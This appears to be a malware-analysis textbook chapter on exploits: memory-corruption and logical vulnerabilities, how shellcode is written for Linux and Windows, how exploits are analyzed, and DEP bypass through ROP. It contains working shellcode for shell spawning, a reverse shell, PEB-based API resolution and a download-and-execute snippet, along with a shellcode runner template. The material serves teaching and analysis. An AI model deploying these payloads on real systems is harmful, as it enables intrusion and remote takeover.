At this stage, we are already aware of the different types of malware. What is common among most of them is that they are standalone and can be executed on their own once they reach the targeted system. However, this is not always the case, and some of them are only designed to work properly with the help of targeted legitimate applications.
In our everyday life, we interact with multiple software products that serve various purposes, from showing us pictures of cats to managing nuclear power plants. Thus, there is a specific category of threats that aim to leverage vulnerabilities hidden in such software to achieve their purposes, whether it is to penetrate the system, escalate privileges, or crash the target application or system to disrupt some important process.
In this chapter, we will be talking about exploits and learning how to analyze them. To that end, we will cover the following topics:
In this section, we will cover what major categories of vulnerabilities and exploits exist and how they are related to each other. We will explain how an attacker can take advantage of a bug (or multiple bugs) to take control of the application (or maybe the whole system) by performing unauthorized actions in its context.
A vulnerability is a bug or weakness inside an application that can be exploited or abused by an attacker to perform unauthorized actions. There are various types of vulnerabilities, most of which are caused by insecure coding practices and mistakes. You should pay attention when processing any input controlled by the end user, including environment variables and dependency modules. In this section, we will explore the most common cases and learn how attackers can leverage them.
The stack overflow vulnerability is one of the most common vulnerabilities and the one that is generally addressed first by exploit mitigation technologies. Its risk has been reduced in recent years thanks to new improvements such as the introduction of the Data Execution Prevention/No Execute (DEP/NX) technique, which will be covered in greater detail in the Exploring bypasses for exploit mitigation technologies section. However, under certain circumstances, it can still be successfully exploited or at least used to perform a Denial of Service (DoS) attack.
Let’s take a look at the following simple application written in C:
int vulnerable(char *arg)
{
    char Buffer[80];
    strcpy(Buffer, arg);
    return 0;
}

int main(int argc, char *argv[])
{
    // the command line argument
    vulnerable(argv[1]);
}
As you know, the space for the Buffer[80] variable (as any local variable) is allocated on the stack, followed by the EBP register’s value, which is pushed at the beginning of the function prologue, and the return address:
Figure 8.1 – Local variable representations in the stack
So, by simply passing this application an argument longer than 80 bytes, the attacker can overwrite the whole buffer space, as well as the saved EBP value and the return address. This way, they can take control of the address from which the application will continue executing after the vulnerable function returns. The following diagram demonstrates overwriting Buffer[80] and the return address with shellcode:
Figure 8.2 – Overwriting Buffer[80] and the return address with shellcode
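The overwrite mechanics can be illustrated safely in C with a struct that simulates the frame layout from Figure 8.1. This is only a sketch: the struct, the field names, and the overflow helper are illustrative, and a real stack frame is managed by the CPU, not by a C struct.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Simulated stack frame layout: the local buffer, the saved EBP value,
 * and the return address, laid out contiguously as in Figure 8.1.
 * Illustration only; a real frame is managed by the CPU. */
struct fake_frame {
    char     buffer[80];
    uint32_t saved_ebp;
    uint32_t return_address;
};

/* Mimics the unchecked strcpy() in vulnerable(): copies len bytes with
 * no bounds check. Since buffer is the first field, a payload longer
 * than 80 bytes spills into saved_ebp and return_address. */
void overflow(struct fake_frame *f, const unsigned char *payload, size_t len) {
    memcpy(f, payload, len);  /* no bounds check, as with strcpy */
}
```

A payload of 88 bytes (80 bytes of filler, 4 bytes over the saved EBP, and 4 bytes over the return address) is enough to redirect execution in this model.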
This is the most basic stack overflow vulnerability. Now, let’s look at other common types of vulnerabilities, such as heap overflow.
In this case, instead of using the stack, the affected variable would be stored in a dynamically allocated space in memory called the heap. This memory allocation can be done using malloc, HeapAlloc, or other similar APIs. Windows supports two types of heaps: the default one and the private (that is, dynamic) one(s); all of them follow the _HEAP structure. The default heap’s address is stored in the PEB structure in the ProcessHeap field and can be obtained by calling the GetProcessHeap API; private ones are returned by APIs such as HeapCreate when they are created. All heap addresses (including the default one) are stored in a list that’s pointed to by the ProcessHeaps field of PEB.
Unlike the stack, the heap doesn’t store return addresses that would make it easily exploitable, but there are other ways to abuse it. To understand them, we first need to learn some basics about the heap structure. The data used by the application is stored in heap chunks. Chunks are stored within heap segments, which start with a _HEAP_SEGMENT structure and are pointed to by the _HEAP structure. Each heap chunk consists of a header (the _HEAP_ENTRY structure) and the actual data. However, when the chunk is freed, the data following the _HEAP_ENTRY structure is replaced with a linked list structure, _LIST_ENTRY, that interconnects free chunks. This structure consists of a pointer to the previous free chunk (the Blink field) and a pointer to the next free chunk (the Flink field); the first and last free chunks in a list are pointed to by the FreeList field of the _HEAP structure. When the system needs to remove a freed chunk from this list (for example, when the chunk is allocated again or as part of the chunk consolidation process), unlinking takes place: the next chunk’s address is written into the previous chunk’s Flink field, and the previous chunk’s address into the next chunk’s Blink field, removing the chunk from the list. The corresponding code will look like this:
Figure 8.3 – Sample code for the unlinking process
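The unlink operation can be sketched in C as follows. This is a simplified illustration using the structure names from the text; real heap code performs additional safety checks (which is exactly what later mitigations added).

```c
#include <assert.h>
#include <stddef.h>

/* Simplified free-list entry, as embedded in a freed heap chunk. */
typedef struct _LIST_ENTRY {
    struct _LIST_ENTRY *Flink;  /* next free chunk */
    struct _LIST_ENTRY *Blink;  /* previous free chunk */
} LIST_ENTRY;

/* The classic unlink: writes entry->Flink into the previous node and
 * entry->Blink into the next node. If an overflow lets the attacker
 * control Flink and Blink, this becomes an arbitrary pointer-sized
 * write to an attacker-chosen address. */
void unlink_entry(LIST_ENTRY *entry) {
    entry->Blink->Flink = entry->Flink;
    entry->Flink->Blink = entry->Blink;
}
```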
By overflowing a variable stored on the heap, the attacker may be able to overwrite the Flink and Blink values of an adjacent free chunk, which makes it possible to write an arbitrary value to an arbitrary address during the unlinking step. For example, this can be used to overwrite the address of some existing function that is guaranteed to be executed with the address of the shellcode to achieve its execution.
Multiple mitigations have been introduced over time to combat this technique. Starting from Windows XP SP2, because of additional checks being introduced, attackers had to switch from abusing FreeList to the Lookaside list for a similar purpose. Starting from Windows Vista, among other changes, the Lookaside list was replaced with a Low Fragmentation Heap (LFH) approach and the chunk headers started to be XORed with the Encoding field value, forcing attackers to explore different techniques such as overwriting the _HEAP structure. In Windows 8, Microsoft engineers introduced additional checks and limitations to fight this approach – and this battle is still ongoing.
This type of vulnerability is still widely exploited, despite all the exploit mitigations introduced in later versions of Windows. Such vulnerabilities are commonly triggered through scripting languages, such as JavaScript in browsers or in PDF files.
This vulnerability occurs when an object (a structure in memory, which we will cover in detail in the next chapter) is still being referenced after it has been freed. Imagine that the code looks something like this:
OBJECT *Buf = malloc(sizeof(OBJECT));
Buf->address_to_a_func = IsAdmin;
free(Buf);
....
<some code>
....
// execute this function after the buffer was freed
(Buf->address_to_a_func)();
In the preceding code, Buf contains the address of the IsAdmin function, which is called later, after the whole Buf variable has been freed. Do you think address_to_a_func will still be pointing to IsAdmin? Maybe, but if this area is reallocated for another variable controlled by the attacker, they can set the value of address_to_a_func to the address of their choice. As a result, this could allow the attacker to execute their shellcode and take control of the system.
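The pattern can be reproduced deterministically with a toy one-slot allocator that always reuses the same memory, simulating what happens when the freed chunk is reallocated to the attacker. All names here (toy_alloc, attacker_func, and so on) are illustrative:

```c
#include <assert.h>
#include <stddef.h>

/* One-slot "allocator" that always hands out the same memory block,
 * deterministically simulating how a freed chunk can be reused. */
static unsigned char slot[64];
static void *toy_alloc(size_t n) { (void)n; return slot; }
static void  toy_free(void *p)   { (void)p; }

typedef struct { int (*address_to_a_func)(void); } OBJECT;

static int IsAdmin(void)       { return 0; }
static int attacker_func(void) { return 1; }

/* Reproduces the use-after-free pattern from the text: the object is
 * freed, the attacker reallocates the same memory and plants their own
 * function pointer, and then the stale pointer is used. */
int use_after_free_demo(void) {
    OBJECT *Buf = toy_alloc(sizeof(OBJECT));
    Buf->address_to_a_func = IsAdmin;
    toy_free(Buf);

    /* attacker-controlled reallocation of the same chunk */
    OBJECT *attacker = toy_alloc(sizeof(OBJECT));
    attacker->address_to_a_func = attacker_func;

    /* the stale pointer is used after free: attacker code runs */
    return Buf->address_to_a_func();
}
```

The stale call through Buf ends up executing attacker_func, which is exactly the control-flow hijack the attacker is after.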
In object-oriented programming (OOP), it’s common to see variables (or objects) that have an array of functions being executed. These are known as vtable arrays. When a vtable array is overwritten and any function inside this table is called, the attackers can redirect the execution to their shellcode.
As we know, integer values can take 1, 2, 4, or 8 bytes of memory. Regardless of how much space is granted to store them, there are always numbers too big to fit there. An integer overflow vulnerability occurs when the attacker is able to provide a number outside the range supported by the data type intended to store it. An example would be storing the unsigned integer 256 (100000000b) in a byte-sized variable, which results in 0 (00000000b) being stored, as only the last 8 bits fit into a byte. This may lead to unexpected behavior in the program in favor of the attacker, such as allocating a buffer whose length is 0 and then writing data outside of its bounds.
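The truncation described above takes only a couple of lines to reproduce (to_byte is an illustrative name): if a size check is performed on the full value but only the low byte is later used for allocation, 256 silently becomes 0.

```c
#include <assert.h>
#include <stdint.h>

/* Truncates a value to a single byte, as happens when a larger integer
 * is stored into a byte-sized variable: only the low 8 bits survive. */
uint8_t to_byte(unsigned int value) {
    return (uint8_t)value;
}
```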
A logical vulnerability is a vulnerability that doesn’t require memory corruption to be executed. Instead, it abuses the application logic to perform unintended actions. A good example of this is CVE-2010-2729 (MS10-061), named Windows Print Spooler Service Vulnerability, which is used by the Stuxnet malware. Let’s dig deeper into how it works.
Windows printing APIs allow the user to choose the directory to which the file to be printed will be copied. Then, with an API named GetSpoolFileHandle, the attacker can get the file handle of the newly created file on the target machine and easily write any data there using the WriteFile (or similar) API. A vulnerability like this targets the application logic: it allows the attacker to choose an arbitrary directory and provides them with a file handle they can use to overwrite the file with any data they want.
Different logical vulnerabilities are possible, and there is no specific format for them. This is why there is no universal mitigation for these types of vulnerabilities. However, they are still relatively rare compared to memory corruption ones as they are harder to find and not all of them lead to arbitrary code execution.
There are other types of vulnerabilities out there, but the types that we have just covered form the cornerstone of most vulnerabilities you are likely to encounter.
Now that we have covered how the attacker can force the application to execute its code, let’s take a look at how this code is written and what challenges the attacker faces when writing it.
Generally speaking, an exploit is a piece of code or data that takes advantage of a bug in software to perform an unintended behavior. There are several ways exploits can be classified. First of all, apart from the vulnerability that they target, when we talk about exploits, it is vitally important to figure out the actual result of the action being performed. Here are some of the most common types:
Depending on the location where the exploit communicates with the targeted software, it is possible to distinguish between the following groups:
Finally, if the exploit targets a vulnerability that hasn’t been officially addressed and fixed yet, it is known as a zero-day exploit.
Now, it is time to deep dive into various aspects of shellcode.
In this section, we will take a look at the code that gets executed by the attacker during vulnerability exploitation. This code gets executed in very special conditions without headers and known memory addresses. Let’s learn what shellcode is and how it’s written for Linux (Intel and ARM processors) and, later, the Windows operating system.
Shellcode is a list of carefully crafted instructions that can be executed once code has been injected into a running application. Due to most of the exploit’s circumstances, the shellcode must be position-independent code (which means it doesn’t need to run in a specific place in memory or require a base relocation table to fix its addresses). Shellcode also has to operate without an executable header or a system loader. For some exploits, it can’t include certain bytes (especially null for the overflows of the string-type buffers).
Now, let’s take a look at what shellcode looks like in Windows and Linux.
Linux shellcode is generally much simpler in structure than Windows shellcode. Once the program counter register is pointing to the shellcode, it can execute consecutive system calls to spawn a shell, listen on a port, or connect back to the attacker with minimal effort (check out Chapter 11, Dissecting Linux and IoT Malware, for more information about system calls in Linux). The main challenges that attackers face are as follows:
Now, let’s learn how it is possible to overcome these challenges. After this, we will look at different types of shellcode.
This is a relatively easy task. Here, the shellcode abuses the call instruction, which saves the absolute return address in the stack (which the shellcode can get using the pop instruction).
An example of this is as follows:
call next_ins
next_ins:
pop eax ; now eax stores the absolute address of next_ins
After getting the absolute address, the shellcode can get the address of any data inside the shellcode, like so:
call next_ins
next_ins:
pop eax ; now eax has the absolute address of next_ins
add eax, <data_sec – next_ins> ; now, eax stores the address of the data section
data_sec:
db 'Hello, World',0
Another common way to get the absolute address is by using the fstenv FPU instruction. This instruction saves some parameters related to the FPU for debugging purposes, including the absolute address of the last executed FPU instruction. This instruction can be used like this:
_start:
fldz
fstenv [esp-0xc]
pop eax
add eax, <data_sec – _start>
data_sec:
db 'Hello, World', 0
As you can see, the shellcode was able to obtain the absolute address of the last executed FPU instruction, fldz (which in this case is also the address of _start); this can help in obtaining the address of any required data or string in the shellcode.
Null-free shellcode is a type of shellcode that has to avoid any null byte to be able to fit a null-terminated string buffer. The authors of this shellcode have to change the way they write their code. Let’s take a look at an example.
For the call/pop approach that we described earlier, the instructions will be assembled into the following bytes:
Figure 8.4 – call/pop in OllyDbg
As you can see, because of the relative addresses the call instruction uses, it produced 4 null bytes. For the shellcode authors to handle this, they need the relative address to be negative. It could work in a case like this:
Figure 8.5 – call/pop in OllyDbg with no null bytes
Here are some other examples of the changes the malware authors can make to avoid null bytes:
As you can see, it’s not very hard to do this in shellcode. You will notice that most of the shellcode from different exploits (or even the shellcode in Metasploit) is null-free by design, even if the exploit doesn’t necessarily require it.
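One classic change of this kind is replacing mov eax, 0 (which assembles to B8 00 00 00 00 and thus contains four null bytes) with xor eax, eax (which assembles to the null-free 31 C0). Authors then typically verify the final byte sequence with a simple check; contains_null below is an illustrative helper for this purpose:

```c
#include <assert.h>
#include <stddef.h>

/* Returns 1 if the shellcode contains a null byte (which would truncate
 * it when copied via string functions such as strcpy), 0 otherwise. */
int contains_null(const unsigned char *code, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (code[i] == 0x00)
            return 1;
    return 0;
}
```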
Let’s start with a simple example that spawns a shell:
jmp _end
_start:
xor ecx, ecx
xor eax, eax
pop ebx      ; load /bin/sh in ebx
mov al, 11   ; execve syscall ID
xor ecx, ecx ; no arguments in ecx
int 0x80     ; syscall
mov al, 1    ; exit syscall ID
xor ebx, ebx ; no errors
int 0x80     ; syscall
_end:
call _start
db '/bin/sh',0
Let’s take a closer look at this code:
int execve(const char *filename, char *const argv[], char *const envp[]);
void _exit(int status);
In this example, you have seen how shellcode can give attackers a shell by launching /bin/sh. For the x64 version, there are a few differences:
The code will look like this:
xor rdx, rdx
push rdx ; null bytes after the /bin/sh
mov rax, 0x68732f2f6e69622f ; '/bin//sh' (the extra slash pads the string to 8 bytes)
push rax
mov rdi, rsp
push rdx ; null arguments for /bin/sh
push rdi
mov rsi, rsp
xor rax, rax
mov al, 0x3b ; execve system call
syscall
xor rdi, rdi
mov rax, 0x3c ; exit system call
syscall
As you can see, there are no big differences between x86 and x64 when it comes to the shellcode. Now, let’s take a look at more advanced types of shellcode.
The reverse shell shellcode is one of the most widely used types of shellcode. This shellcode connects to the attacker and provides them with a shell on the remote system to gain full access to the remote machine. For this to happen, the shellcode needs to follow these steps:
You will usually see it being used like this:
socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
Here, AF_INET is the address family used for IPv4 communication, and IPPROTO_IP selects the default protocol for the given socket type. SOCK_STREAM is used to represent TCP communication. From this system call, you can understand that this shellcode is communicating with the attacker through TCP. The assembly code looks like this:
xor edx, edx ; cleanup edx
push edx ; protocol=IPPROTO_IP (0x0)
push 0x1 ; socket_type=SOCK_STREAM (0x1)
push 0x2 ; socket_family=AF_INET (0x2)
mov ecx, esp ; pointer to socket() args
xor ebx, ebx
mov bl, 0x1 ; SYS_SOCKET
xor eax,eax
mov al, 0x66 ; socketcall syscall ID
int 0x80
xchg edx, eax ; edx=sockfd (the returned socket)
Here, the shellcode uses the socketcall system call (with ID 0x66). This system call represents many system calls, including socket, connect, listen, bind, and so on. In ebx, the shellcode sets the function it wants to execute from the socketcall list. Here is a snippet of the list of functions supported by socketcall:
SYS_SOCKET 1
SYS_BIND 2
SYS_CONNECT 3
SYS_LISTEN 4
SYS_ACCEPT 5
The shellcode pushes the arguments to the stack and then sets ecx to point to the list of arguments, sets ebx = 1 (SYS_SOCKET), sets the system call ID in eax (socketcall), and then executes the system call.
int connect(int sockfd, const struct sockaddr *addr,socklen_t addrlen);
The assembly code will look as follows:
push 0x0101017f ; sin_addr=127.1.1.1 (network byte order)
xor ecx, ecx
mov cx, 0x3905
push cx ; sin_port=1337 (network byte order)
inc ebx
push bx ; sin_family=AF_INET (0x2)
mov ecx, esp ; save pointer to sockaddr struct
push 0x10 ; addrlen=16
push ecx ; pointer to sockaddr
push edx ; sockfd
mov ecx, esp ; pointer to connect() args
inc ebx ; sys_connect (0x3)
int 0x80 ; exec sys_connect
push 0x2
pop ecx ; set loop counter
xchg ebx, edx ; save sockfd
; loop through three sys_dup2 calls to redirect stdin(0), stdout(1) and stderr(2)
loop:
mov al, 0x3f ; sys_dup2 systemcall ID
int 0x80
dec ecx ; decrement loop-counter
jns loop ; as long as SF is not set -> continue
In the preceding code, the shellcode overwrites stdin (0), stdout (1), and stderr (2) with sockfd (the socket handle) to redirect any input, output, and errors to the attacker, respectively.
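The sockaddr_in structure that the pushes above assemble on the stack can be cross-checked in C on a POSIX system; build_target is an illustrative helper name. Note how both the port and the address end up in network byte order, matching the 0x3905 and 0x0101017f values from the assembly.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <assert.h>
#include <string.h>

/* Builds the same sockaddr_in that the shellcode assembles on the
 * stack: AF_INET, the given port, and the given IPv4 address, with the
 * port and address stored in network byte order. */
struct sockaddr_in build_target(const char *ip, unsigned short port) {
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof(sa));
    sa.sin_family      = AF_INET;
    sa.sin_port        = htons(port);     /* 1337 -> bytes 05 39 */
    sa.sin_addr.s_addr = inet_addr(ip);   /* "127.1.1.1" -> bytes 7f 01 01 01 */
    return sa;
}
```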
Now that you have seen more advanced shellcode, you can understand most of the well-known shellcode and the methodology behind them. For binding a shell or downloading and executing shellcode, the code is very similar, and it uses similar system calls and maybe one or two extra functions. You will need to check the definition of every system call and what arguments it takes before analyzing the shellcode based on that.
That’s it for x86 (both 32-bit and 64-bit). Now, let’s take a quick look at ARM shellcoding and the differences between it and x86.
The shellcode on ARM systems is very similar to the shellcode that uses the x86 instruction set. It’s even easier for the shellcode authors to write in ARM as they don’t have to use the call/pop technique or fstenv to get the absolute address. In ARM assembly language, you can access the program counter register (pc) directly from the code, which makes this even simpler. Instead of int 0x80 or syscall, the shellcode uses svc #0 or svc #1 to execute a system function. An example of ARM shellcode for executing a local shell is as follows:
_start:
add r0, pc, #12
mov r1, #0
mov r2, #0
mov r7, #11 ; execve system call ID
svc #1
.ascii "/bin/sh "
In the preceding code, the shellcode sets r0 with the program counter (pc) + 12 to point to the /bin/sh string. Then, it sets the remaining arguments for the execve system call and calls the svc instruction to execute the code.
ARM instructions are usually 32-bit instructions. However, many shellcodes switch to Thumb Mode, which sets the instructions to be 16 bits only and reduces the chances of having null bytes. For the shellcode to switch to Thumb Mode, it is common to use the BX or BLX instructions.
After executing it, all instructions switch to the 16-bit mode, which reduces null bytes significantly. By using svc #1 instead of svc #0 and avoiding immediate null values and instructions that include null bytes, the shellcode can reach the null-free goal.
When analyzing ARM shellcode, make sure that you disassemble all the instructions after the mode switches to 16-bit rather than 32-bit.
Now that we have covered Linux shellcode for Intel and ARM processors, let’s take a look at Windows shellcode.
Windows shellcode is more complicated than its Linux counterpart. In Windows, you can’t directly use sysenter or interrupts like in Linux as the system function IDs change from one version to another. Windows provides interfaces to access their functionality in libraries, such as kernel32.dll. Windows shellcode has to find the base address of kernel32.dll and go through its export table to get the required APIs to implement their functionality. In terms of socket APIs, attackers may need to load additional DLLs using LoadLibraryA/LoadLibraryExA.
Windows shellcode follows these steps to achieve its target:
Now that we’ve covered how shellcode gets its absolute address, let’s look at how it gets the base address of kernel32.dll.
kernel32.dll is the main DLL that’s used by shellcode. It has APIs such as LoadLibrary, which allows you to load other libraries, and GetProcAddress, which gets the address of any API inside a library that’s loaded in memory.
To access any API inside any DLL, the shellcode must get the address of kernel32.dll and parse its export table. When an application is being loaded into memory, the Windows OS loads its core libraries, such as kernel32.dll and ntdll.dll, and saves the addresses and other information about these libraries inside the Process Environment Block (PEB). The shellcode can retrieve the address of kernel32.dll from the PEB as follows (for 32-bit systems):
mov eax, dword ptr fs:[30h]
mov eax, dword ptr [eax+0Ch]
mov ebx, dword ptr [eax+1Ch]
mov ebx, dword ptr [ebx]
mov esi, dword ptr [ebx+8h]
The first line gets the PEB address from the FS segment register (in x64, it will be the GS register and a different offset). Then, the second and the third lines get PEB->LoaderData->InInitializationOrderModuleList.
InInitializationOrderModuleList is a linked list that contains information about all the loaded modules (PE files) in memory (such as kernel32.dll, ntdll.dll, and the application itself), including each module’s base address, filename, and other information.
The first entry that you will see in InInitializationOrderModuleList is ntdll.dll. To get kernel32.dll, the shellcode must go to the next item in the list. So, in the fourth line, the shellcode gets the next item while following the forward link (ListEntry->FLink). It gets the base address from the available information about the DLL in the fifth line.
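The walk above can be modeled with mock structures; the definitions below are simplified stand-ins for the real loader structures in ntdll, and the assumption that kernel32.dll is the second entry holds for the older Windows versions this classic technique targets (on newer versions, the exact position in the list differs, so real shellcode often checks the module name as well).

```c
#include <assert.h>
#include <stdint.h>

/* Simplified mock of a loader list entry; the real definitions live in
 * ntdll and contain many more fields. */
typedef struct _MOCK_MODULE {
    struct _MOCK_MODULE *Flink;  /* next module in the list */
    uintptr_t            DllBase;
    const char          *Name;
} MOCK_MODULE;

/* Mimics the walk in the assembly above: the first entry of
 * InInitializationOrderModuleList is ntdll.dll; following
 * ListEntry->Flink yields the next module, whose DllBase is read
 * (kernel32.dll on the older Windows versions assumed here). */
uintptr_t find_kernel32(MOCK_MODULE *list_head) {
    MOCK_MODULE *ntdll    = list_head;     /* first entry: ntdll.dll */
    MOCK_MODULE *kernel32 = ntdll->Flink;  /* follow the forward link */
    return kernel32->DllBase;              /* read the base address */
}
```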
For the shellcode to be able to access the APIs of kernel32.dll, it should parse its export table. The export table consists of three arrays. The first array is AddressOfNames, which contains the names of the APIs exported by the DLL file. The second array is AddressOfFunctions, which contains the relative virtual addresses (RVAs) of all of these APIs:
Figure 8.6 – Export table structure (the numbers are not real and have been provided as an example)
However, the issue here is that these two arrays are not aligned with each other. For example, GetProcAddress could be the third item in AddressOfNames but the fifth item in AddressOfFunctions.
To handle this issue, Windows provides a third array named AddressOfNameOrdinals. This array is parallel to AddressOfNames and contains, for every name, the index of the corresponding item in AddressOfFunctions. Note that AddressOfFunctions may have more items than AddressOfNames, since not all APIs have names. The APIs without names are accessed by their ordinal (their index in AddressOfFunctions). The export table will look something like this:
Figure 8.7 – Export table parser (the winSRDF project)
For the shellcode to get the address of a required API, it searches for the API’s name in AddressOfNames, takes its index, and looks up that index in AddressOfNameOrdinals to find the equivalent index of this API in AddressOfFunctions. By doing this, it obtains the relative address of the API, which it adds to the base address of kernel32.dll to get the API’s full address. In most cases, instead of matching the API names against strings that it would need to hardcode within itself, the shellcode uses their hashes (more information can be found in Chapter 6, Bypassing Anti-Reverse Engineering Techniques).
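The three-array lookup can be sketched over mock data as follows. The structure and helper names (MOCK_EXPORTS, resolve_api) are illustrative; real shellcode performs the same walk directly over the PE export directory, usually comparing hashes rather than strings.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Mock export table: three parallel arrays, as in the text. The
 * ordinal array maps a name's index to the function's index in
 * AddressOfFunctions. */
typedef struct {
    const char    **AddressOfNames;
    const uint16_t *AddressOfNameOrdinals;
    const uint32_t *AddressOfFunctions;   /* RVAs */
    size_t          NumberOfNames;
} MOCK_EXPORTS;

/* Resolves an API the way shellcode does: find the name, take its
 * index, look up the ordinal, use that as the index into the RVA
 * array, and add the module base. Returns 0 if the name is absent. */
uintptr_t resolve_api(const MOCK_EXPORTS *e, uintptr_t base, const char *name) {
    for (size_t i = 0; i < e->NumberOfNames; i++) {
        if (strcmp(e->AddressOfNames[i], name) == 0) {
            uint16_t ordinal = e->AddressOfNameOrdinals[i];
            return base + e->AddressOfFunctions[ordinal];
        }
    }
    return 0;
}
```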
This shellcode uses an API located in urlmon.dll called URLDownloadToFileA. As its name suggests, it downloads a file from a given URL and saves it to the hard disk when it’s provided with the required path. The definition of this API is as follows:
URLDownloadToFile(LPUNKNOWN pCaller, LPCTSTR szURL, LPCTSTR szFileName, _Reserved_ DWORD dwReserved, LPBINDSTATUSCALLBACK lpfnCB);
Only szURL and szFilename are required. The remaining arguments are mostly set to null. After the file is downloaded, the shellcode executes this file using CreateProcessA, WinExec, or ShellExecute. The C code for this may look as follows:
URLDownloadToFileA(0, "https://localhost:4444/calc.exe", "calc.exe", 0, 0);
WinExec("calc.exe", SW_HIDE);
As you can see, the payload is very simple and yet very effective in executing the second stage of the attack, which could be the backdoor that maintains persistence and can communicate to the attacker and exfiltrate valuable information.
Now that we have learned about what exploits look like and how they work, let’s summarize some practical tips and tricks for their analysis.
Firstly, you need to carefully collect any prior knowledge: what environment the exploit was found in, whether it is already known what software was targeted and its version, and whether the exploit triggered successfully there. All this information will allow you to properly emulate the testing environment and successfully reproduce the expected behavior, which is very helpful for dynamic analysis.
Secondly, it is important to confirm how it interacts with the targeted application. Usually, exploits are delivered through the expected input channel (whether it is a listening socket, a web form or URI, or maybe a malformed document, a configuration file, or a JavaScript script), but other overlooked options are also possible (for example, environment variables and dependency modules). The next step here is to use this information to successfully reproduce the exploitation process and identify the indicators that can confirm it. Examples include the target application crashing in a particular way or performing particular actions that can be seen using suitable system monitors (for example, the ones that keep track of file, registry, or network operations or accessed APIs). If shellcode is involved, its analysis may give valuable information about the expected after-exploitation behavior.
After this, you need to identify the targeted vulnerability. The MITRE Corporation maintains a list of all publicly known vulnerabilities by assigning the corresponding Common Vulnerabilities and Exposures (CVE) identifiers to them so that they can easily be referenced (for example, CVE-2018-9206). Sometimes, it may be already known from antivirus detection or publications, but it is always advisable to confirm it in any case.
Check for unique strings first as they may give you a clue about the parts of the targeted software it interacts with. Unlike most other types of malware, static analysis may not be enough in this case. Since exploits work closely with the targeted software, they should be analyzed in their context, which in many cases requires dynamic analysis.
Here, you need to intercept the moment the exploit is delivered but hasn’t been processed yet using a debugger of preference. After this, there are multiple ways the analysis can be continued. One approach is to carefully go through the functions that are responsible for it being processed at a high level (without stepping into each function) and monitor the moment when it triggers. Once this happens, it becomes possible to narrow down the searching area and focus on the sub-functions of the identified function. Then, the engineer can repeat this process up until the moment the bug is found.
Another way to do this is to search for suspicious entries in the exploit itself first (such as corrupted fields, big binary blocks with high entropy, long lines with hex symbols, and so on) and monitor how the targeted software processes them. If shellcode is involved, it is possible to patch it with either breakpoint or infinite loop instructions at its beginning (0xCC and 0xEB 0xFE, respectively), then perform steps to reproduce the exploitation, wait until the inserted instructions get executed, and check the stack trace to see what functions have been called to reach this point.
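The patching step amounts to overwriting the first shellcode bytes in the captured buffer; the helpers below (with illustrative names) show the two options from the text: a software breakpoint (0xCC, int3) or an infinite loop (0xEB 0xFE, a jmp to itself).

```c
#include <assert.h>

/* Overwrites the start of a shellcode buffer with a software
 * breakpoint (0xCC), so an attached debugger breaks when it runs. */
void patch_breakpoint(unsigned char *code) {
    code[0] = 0xCC;
}

/* Overwrites the start of a shellcode buffer with an infinite loop
 * (0xEB 0xFE, jmp $), so the analyst can attach while it spins. */
void patch_infinite_loop(unsigned char *code) {
    code[0] = 0xEB;
    code[1] = 0xFE;
}
```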
Overall, it is generally recommended to stick to the virtualized environment or emulation for dynamic analysis since in the case of exploits, it is much more probable that something may go wrong, and execution control will be lost. Therefore, it is convenient to be able to restore the previous debugging and environmental state.
These techniques are universal and can be applied to pretty much any type of exploit. Regardless of whether the engineer has to analyze browser exploits (often written in JavaScript) or some local privilege escalation code, the difference will mainly be in the setup for the testing environment.
If you need to analyze the binary shellcode, you can use a debugger for the targeted architecture and platform (such as OllyDbg for 32-bit Windows) by copying the hexadecimal representation of the shellcode and using the binary paste option. It is also possible to use tools such as unicorn, libemu (a small emulator library for x86 instructions), or the Pokas x86 Emulator, which is a part of the pySRDF project, to emulate shellcode. Other great tools useful for dynamic analysis are scdbg and qltool (part of the qiling framework).
Another popular solution is to convert it into an executable file. After this, you can analyze it both statically and dynamically, just like any usual malware sample. One option would be to use the shellcode2exe.py script, but unfortunately, one of its core dependencies is no longer supported, so it may be hard to set it up. Another option would be to compile the executable manually by copying and pasting the shellcode into the corresponding template:
unsigned char code[] = {<output of xxd -i against the shellcode>};

int main(int argc, char **argv)
{
    int (*func)();
    func = (int (*)()) code;
    (*func)();
}
The execution flag may need to be added to the data section to make the shellcode executable.
Finally, it is possible to just open any executable in the debugger and copy and paste the shellcode over the existing code. For example, in x64dbg, it can be done by right-clicking and going to Binary | Paste (Ignore Size).
For the ROP chain to be analyzed, you need to get access to the targeted application and the system so that the actual instructions can be resolved dynamically there.
Since the same types of vulnerabilities kept appearing, despite all the awareness and training for software developers on secure coding, new ways to reduce their impact and make them unusable for remote code execution have been introduced.
In particular, multiple exploit mitigation technologies were developed at various levels to make it hard to impossible for the attackers to successfully execute their shellcode. Let’s take a look at the most well-known mitigations that have been created for this purpose.
Data Execution Prevention (DEP) is one of the earliest techniques introduced to protect against exploits and shellcode. The idea behind it is to stop execution in any memory page that doesn’t have EXECUTE permission. This technique is supported by hardware, which raises an exception once shellcode gets executed in the stack or the heap (or any place in memory that doesn’t have this permission).
This technology didn’t completely stop the attackers from executing their payload and taking advantage of memory corruption vulnerabilities. They invented a new technique to bypass DEP/NX called return-oriented programming (ROP).
The main idea behind ROP is that rather than setting the return address so that it points to the shellcode, attackers can set it to redirect the execution to small snippets of existing code (called gadgets) inside the program or any of its modules and chain them to reproduce the shellcode’s functionality. Such a gadget, typically ending with a ret instruction, may look like this:
mov eax, 1
pop ebx
ret
For example, on Windows, the attacker can try to redirect the execution to the VirtualProtect API to change the permissions of the part of the stack (or heap) that the shellcode is located in and then execute it. Alternatively, it is possible to use combinations such as VirtualAlloc with memcpy or WriteProcessMemory, or HeapAlloc with any memory copy API, or to disable DEP altogether using the SetProcessDEPPolicy or NtSetInformationProcess APIs.
The trick here is to use the Import Address Table (IAT) of a module to get the address of any of these APIs so that the attacker can redirect the execution to the beginning of this API. In the ROP chain, the attacker places all the arguments that are required for each of these APIs, followed by a return to the API they want to execute. An example of this is as follows:
Figure 8.8 – The ROP chain for the CVE-2018-6892 exploit
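As a schematic illustration of how such a chain is laid out, the following Python sketch packs gadget and API addresses together with the VirtualProtect arguments, exactly in the order they would appear on the corrupted stack. All addresses here are hypothetical placeholders invented for the example, not real gadget locations:

```python
import struct

def p32(value):
    # Values are packed as 32-bit little-endian, as they appear on the stack
    return struct.pack("<I", value)
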